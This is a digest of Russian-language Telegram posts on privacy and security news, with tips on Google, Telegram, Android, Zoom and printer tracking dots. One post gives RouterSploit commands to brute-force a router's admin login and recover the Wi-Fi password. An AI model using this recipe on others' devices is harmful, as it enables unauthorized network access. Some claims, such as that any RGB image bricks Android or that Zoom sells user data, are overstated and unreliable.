​​Твой портрет для Google

Не для кого не секрет, что Google собирает и хранит у себя информацию о наших интересах и предпочтениях. Не многие из тех у кого есть аккаунт Google, заходил в свой профиль и смотрел какие данные в нем хранятся. Посмотреть можно не все, но кое-что все же можно.

По адресу adssettings.google.com доступен твой общий «портрет», который Google создал по кусочкам используя информацию вашего профиля, поисковые запросы, историю просмотров на YouTube и еще многих других. Здесь можно посмотреть, что по мнению Google тебя интересует, как например автоматизация дома, фитнес или подержанные авто.

Среди интересов также можно обнаружить такую информацию, как семейное положение, наличие детей, сфера деятельности, размер предприятия, статус домовладения и многое другое. Нажав на иконку можно узнать, как Google получил эту информацию и изменить предпочтения.

По словам Google, эти сведения собираются для того, чтобы показывать наиболее релевантную рекламу. Это можно отключить, но тогда реклама на сайтах будет показываться без учета ваших интересов.

#приватность

​​Новая уязвимость позволяет захватить контроль над любым Android-устройством

Исследователи обнаружили в ОС Android новую опасную уязвимость повышения привилегий, позволяющую злоумышленникам получать доступ практическим ко всем приложениям на устройстве. Атака осуществляется путем отражения, благодаря чему вредоносное ПО может беспрепятственно захватить легитимные приложения, оставаясь при этом полностью незамеченным.

Эксплуатируя эту уязвимость, злоумышленник может с помощью установленного на атакуемом устройстве вредоносного приложения похищать SMS-сообщения, фотографии и учетные данные, отслеживать местоположение по GPS, осуществлять звонки, записывать разговоры, а также шпионить за жертвой с помощью микрофона и камеры смартфона.

Google была уведомлена о проблеме в декабре 2019 года и в апреле 2020 года разослала своим партнерам исправление. Массовое развертывание патча запланировано на текущий месяц.

#новость

​​Как проверить вредоносный файл прямо в Telegram

@DrWebBot — официальный бот от компании Dr.Web, который сканирует ссылки и файлы на предмет вирусов.

Проверять ссылки и файлы можно как в приватном диалоге (напрямую отправлять боту подозрительный контент или пересылать ему сообщения, полученные от других пользователей), так и в групповой беседе — если добавить в нее бота, то он будет срабатывать на все файлы и ссылки в этой беседе.

Познакомиться со всеми возможностями бота поможет команда /help.  У бота есть два режима: «тихий» и обычный. По умолчанию используется обычный режим: бот реагирует на каждый файл или ссылку и отвечает, безопасны ли они.

В групповой беседе поток сообщений от бота может мешать обычному общению, поэтому удобнее использовать «тихий режим»: в этом режиме бот только предостерегает пользователей, когда файл или ссылка в чате содержат угрозу. Выбрать режим можно с помощью команды /mode.

#безопасность

​​Вышел джейлбрейк, который взламывает почти любой iPhone

Хакерская группа Unc0ver опубликовала в сети инструменты для джейлбрейка iOS на всех версиях  с 11 до 13.5, кроме 12.3-12.3.2 или 12.4.2-12.4.5. Джейлбрейк получил название Unc0ver 5.0.1.

Хакеры утверждают, что его установка никак не нарушает конфиденциальность личных данных, хранящихся на устройстве. При этом после взлома продолжат работать основные сервисы Apple — iCloud, iMessage, FaceTime, Apple Pay, Visual Voicemail, Weather и Stocks — а также сохраняется возможность получать обновления iOS в будущем.

По словам пользователей, установивших джейлбрейк, он работает как задумано. Однако, оценить его работу будет сложно, поскольку он имеет закрытый исходный код.

#новость

​​Появилась версия Raspberry Pi 4 с 8 Гб оперативной памяти

Позавчера была анонсирована обновленная версия Raspberry Pi 4 Model B с 8 Гб оперативной памяти на борту. Теперь устройство позволяет запустить как и более тяжелые серверные нагрузки, так и просто открывать еще больше вкладок браузера одновременно.

Сборка официального дистрибутива Raspberry Pi Linux обычно поставляется в 32-битной версии, но теперь, пользователи могут опробовать и 64-битную версию ОС. Обновленная Raspberry Pi с 8 Гб ОЗУ на старте продаж будет стоить 75 долларов США.

Однако, версии Raspberry Pi с 2 и 4 Гб ОЗУ по прежнему остаются пригодными для выполнения различных операций: от пентеста, до обустройства умного дома. Если вы хотите получить Raspberry Pi бесплатно, то на нашем втором канале «Библиотека хакера»  сейчас проходит конкурс, где вы можете выиграть как это замечательное устройство, так и другие ценные призы.

​​Как определить местоположение сотовых вышек

https://xinit.ru/bs/ — сервис определения местоположения (географические координаты и адреса) базовых станций сотовой связи по их параметрам (MCC, MNC, LAC и Cell ID).

Например, если поискать на сайте базовую станцию белорусского оператора МТС (https://xinit.ru/bs/257-01-114-1384), то мы увидим красный значок на улице Аладовых в Минске и зону, которую эта вышка покрывает.

Эти данные используются в основном для показа таргетированной по месту рекламы, а также предоставлять сервис навигации, когда GPS-сигнал пропал или нестабилен. Триангуляция по сотовым вышкам используется также для вычисления местоположения по запросам спецслужб.

Чтобы узнать, к какой вышке подключен ваш телефон в данный момент используйте приложении Network Cell Info Lite. Вкладке RAW будут показаны все нужные данные, которые вы в последствии вставите на сайт для определения местонахождения вышки.

​​Портативные программы

Portable-приложение — это такое приложение, которое не требует установки и может запускаться даже с различных портативных (съемных) носителей.

Например, если вы используете портативную версию браузера, которая находится на флешке, то вся история и другие данные о ваших действиях в браузере хранятся непосредственно на флешке.

Это означает, что после завершения работы браузера вы можете просто вытащить флешку из компьютера и забрать историю просмотров с собой.

На сайте https://portableapps.com/ доступно большое количество программ в портативных вариациях. В их числе самые популярные браузеры.

#полезно

​​Обычная фотография превращает Android-смартфоны в кирпич

Пользователи обнаружили, после установки обычной картинки с пейзажем в качестве обоев устройство перестает отвечать, постоянно включает и отключает экран блокировки и не позволяет сделать что-либо еще.

Дело в том, что обычно Android работает с sRGB, тогда как опасный пейзаж использует RGB. Другими словами, сама по себе фотография абсолютно безвредна, однако из этого следует, что сломать смартфон на базе Android версии от 1 до 10 включительно может абсолютно любое RGB-изображение.

Вернуть смартфон к жизни после этого можно сбросив настройки до заводских настроек или выполнив загрузку через меню recovery и удалив опасное изображение вручную.

#новость

​​Как воруют телеграм-каналы с помощью социальной инженерии

Как стать владельцем телеграм-канала? Купить его, принять в дар или украсть. Дарят каналы редко. А вот случаи воровства сейчас встречаются очень часто.

Схема мошенничества очень проста. Злоумышленник представляется крупным рекламодателем или же желающим купить канал и далее, для якобы подтверждения владения каналом просит включить демонстрацию экрана в Skype или любой другой программе. Во время показа он запрашивает код для входа в аккаунт и сразу же видит его на вашем экране.

Сейчас также набирает популярность способ кражи через вирус удаленного доступа, который можно незаметно подцепить, скачав, например  игру с торента. Оператор вируса дождется момента, когда вы не находитесь у компьютера и сделает скриншот экрана с кодом доступа в Telegram.

Дабы избежать возможности кражи вашего аккаунта таким способом включите двухфакторную аутентификацию в настройках Telegram, а также советуем запретить показ текста уведомлений на заблокированном экране, чтобы избежать риск кражи аккаунта при физическом контакте с вашим устройством.  

#безопасность

​​Apple отслеживают украденные из магазинов смартфоны

В десятках городов США сейчас проходят погромы и массовые беспорядки. Когда протестующие начали грабить магазины Apple, компания начала блокировать устройства, незаконно взятые из магазина, и выводить на экран текст с просьбой вернуть устройство в магазин.

В сообщении написано, что все украденные смартфоны отслеживаются, а данные передаются в полицию. Наводит на мысли, что такая функция присутствует и в не украденных экземплярах.

Маловероятно, что какой-либо из смартфонов вернут в магазин, скорее всего, они будут разобраны на запчасти и распроданы на черном рынке.

​​Шифрование в Zoom для избранных

Весной этого года весь мир начал активно пользоваться Zoom в связи с COVID-19, однако приложение как имело множество проблем с безопасностью и приватностью, так их и не исправило.

В добавок ко всему, генеральный директор Zoom Эрик Юань заявил, что сквозное шифрование видеозвонков будет доступно только в платных тарифах. За приватность все-таки придется заплатить.

Компания планирует сотрудничать с ФБР на случай, если сервис будет использоваться для «недобросовестных» целей. Другими словами, данные пользователей не оплативших тариф будут проданы спецслужбам.

​​Как установить виртуальную машину на Android

VMOS - виртуальная машина на Android, в которой есть ROOT права "из коробки".

Установите и откройте VMOS. Начнется загрузка машины, процесс может занять около 5 минут. После, вы можете открыть виртуальную машину с Android.

Система готова и оборудована всем необходимым для ее использования, от Google Play до различных настроек.

Минимальные системные требования виртуальной ОС:
— 32 GB памяти.
— 2 GB ОЗУ.
— Android 5.1.

​​Как запретить определение местоположения в Яндексе

Яндекс использует ваше местоположение для уточнения результатов поиска, показа организаций, событий и предложений, находящихся по близости.

Если вы не хотите видеть результаты поиска, ориентированные на ваш регион или просто хотите посмотреть, какую поисковую выдачу видят люди из того или иного города, то измените город в настройках местоположения.

Для этого перейдите по адресу tune.yandex.rutune.yandex.ru и уберите галочку с пункта Automatically identify city, а затем, в поле City впишите желаемый город.

#приватность

​​WeChat заблокировал аккаунт с неприличным паролем

Китайский мессенджер WeChat удалил аккаунт американской журналистки через 45 секунд после того, как она установила пароль F*ckCCP89, оскорбительный для Коммунистической партии КНР (CCP).

Можно предположить, что вступили в действие какие-то правила фильтрации запрещённых слов, но это странно, потому что это предполагает расшифровку хешированного пароля, чего не должно быть по определению.

Обжаловать блокировку аккаунта нельзя. Для китайского гражданина потерять доступ WeChat — это значит многого лишиться. Через эту платформу люди поддерживают коммуникации с семьёй и по работе, оплачивают счета, расплачиваются в магазинах, передают деньги и многое другое.

​​Чек-лист по безопасности Telegram аккаунта

В отличие от других мессенджеров, Telegram, при правильном использовании, предоставляет довольно неплохой уровень приватности и безопасности. Этот список советов будет полезен всем, но администраторам Telegram каналов -  в особенности.

1. Установите двухфакторную аутентификацию
Указывать Email не рекомендуется, дабы исключить возможность получить доступ к аккаунту, если почтовый аккаунт будет взломан.

2. Не показывайте демонстрацию экрана
Во время демонстрации экрана злоумышленник может увидеть, запрошенный им код и получить доступ к аккаунту

3. Не синхронизируйте контакты.
При синхронизации вся ваша телефонная книга уходит на серверы Telegram.

4. Не говорите никому свой номер телефона
Бывали случаи, когда мошенники перевыпускали номер телефона у оператора, тем самым получая полный доступ к услугам и дактивизируя оригинальную SIM-карту.

5. Не переходите по подозрительным ссылкам
Хакеры часто используют фишинг от лица администрации телегарам. Администрация не присылает ссылок.

6. Отключите возможность ссылаться на твой аккаунт и добавлять себя в группы
Сделать это можно в настройках конфиденциальности

6. Установите код-пароль и отключите показ текста уведомления на заблокированном экране.
При физическом доступен к вашему устройству можно получить доступ ко всем перепискам и секретным чатам

#безопасность

​​Как получить доступ к админ-панели роутера и узнать пароль от Wi-Fi

Самым простым способом получить доступ к административной панели роутера является использование RouterSploit Framework. Он представляет из себя фреймворк с открытым исходным кодом, посвящённый эксплуатации встраиваемых устройств (роутеров, беспроводных точек доступа).

С помощью фреймворка можно выбрать подходящий тип авторизации в административную панель и запустить перебор по словарю.

1. Устанавливаем фреймворк:
$ git clone https://www.github.com/threat9/routersploit
$ cd routersploit
$ python3 -m pip install -r requirements.txt
$ python3 rsf.py

2. Для выполнения атаки необходимо выполнить следующие команды:
$ use creds/http_basic_bruteforce
$ set target 192.168.0.2
$ set passwords file:///usr/share/wordlists/nmap.lst
$ run

После успешного подбора авторизационных данных, вы можете зайти в панель настроек и найти пароль от Wi-Fi, как правило, в открытом виде. Вы также можете его поменять, отключить устройства, изменить настройки и многое другое.

​​Браузер Brave подставлял реферальные ссылки в адресную строку

Пользователи заметили странность в поведении ориентированного на конфиденциальность браузера Brave: автозаполнение подставляло в строку адреса реферальные ссылки.

Если пользователь набирает в Brave адрес криптовалютной биржи Binance (binance.us или binance.com), срабатывает автозаполнение, и в адресной строке появляется партнерская ссылка binance.us/en?ref=35089877.

Дальнейшее исследование репозитория Brave на GitHub показало, что браузер также содержит реферальные ссылки для URL-адресов Ledger, Trezor и Coinbase. И от таких партнерств браузер тоже получает прибыль.

​​Как вычислить человека по распечатке с принтера

В 2017 году девушка, работающая в компании - подрядчике АНБ решила обнародовать секретные документы, распечатав их на своем домашнем принтере и отправив по почте журналистам, которые в последствии их отсканировали и опубликовали. Спустя два дня к ней в дом ворвались агенты ФБР.

Дело в том, что отсканированные копии получились очень хорошего качества, включая точки-маркеры, которые тайно проставляют принтеры на каждую отпечатанную страницу. Они едва заметны невооружённым глазом и создают закодированный рисунок.

По этим точкам можно определить дату и время распечатки документов, а также серийный номер принтера. Все современные коммерческие цветные лазерные принтеры используют тот или иной способ стеганографии для идентификации распечаток, однако большинство пользователей даже не подозревают об этом.

Проверьте, не шифрует ли ваш принтер метаданные на бумаге. Такие точки хорошо заметны при освещении синим LED.

​​Как обойти рекламу на YouTube с помощью точки в адресной строке

Если в десктопной версии любого браузера поставить точку после домена youtube.com, то реклама на сайте не будет показываться.  Например, https://www.youtube.com/watch?v=mjKCFVkw7vY - по этой ссылке будет показываться реклама, как обычно. Но если после youtube.com поставить точку, то рекламы не будет - https://www.youtube.com./watch?v=mjKCFVkw7vY

Дело в том, что веб-сайты забывают нормализовать имя хоста. Контент по-прежнему показывается, но в браузере нет совпадения имен хостов, поэтому нет файлов cookie и не работает технология CORS, которую крупные сайты используют для показа рекламы, находящейся на другом домене, который не содержит лишнюю точку.

Этот баг также работает на многих новостных сайтах и на некоторых сайтах с платными статьями.

​​Великобритания запускает приложение, следящее за вашим кругом общения

Приложение мониторинга контактов предназначено для информирования людей о том, что они находятся или находились в тесном контакте с человеком, у которого выявлен COVID-19.

Принцип работы заключается в анализе данных с Bluetooth-передатчиков мобильных устройств. Сигналы Bluetooth выполняют цифровое «рукопожатие», когда два устройства находятся близко друг к другу. Если будет зафиксирован тесный контакт с инфицированным, то владелец получит соответствующее уведомление.

Правда, есть «маленький» нюанс, чтобы приложение действительно работало эффективно, его должно загрузить не менее 80% пользователей смартфонов в Великобритании, а это около 60% населения страны. Для сравнения, WhatsApp — скачали и установили лишь 67%. Вопрос анонимности собираемых данных о передвижениях также остается открытым.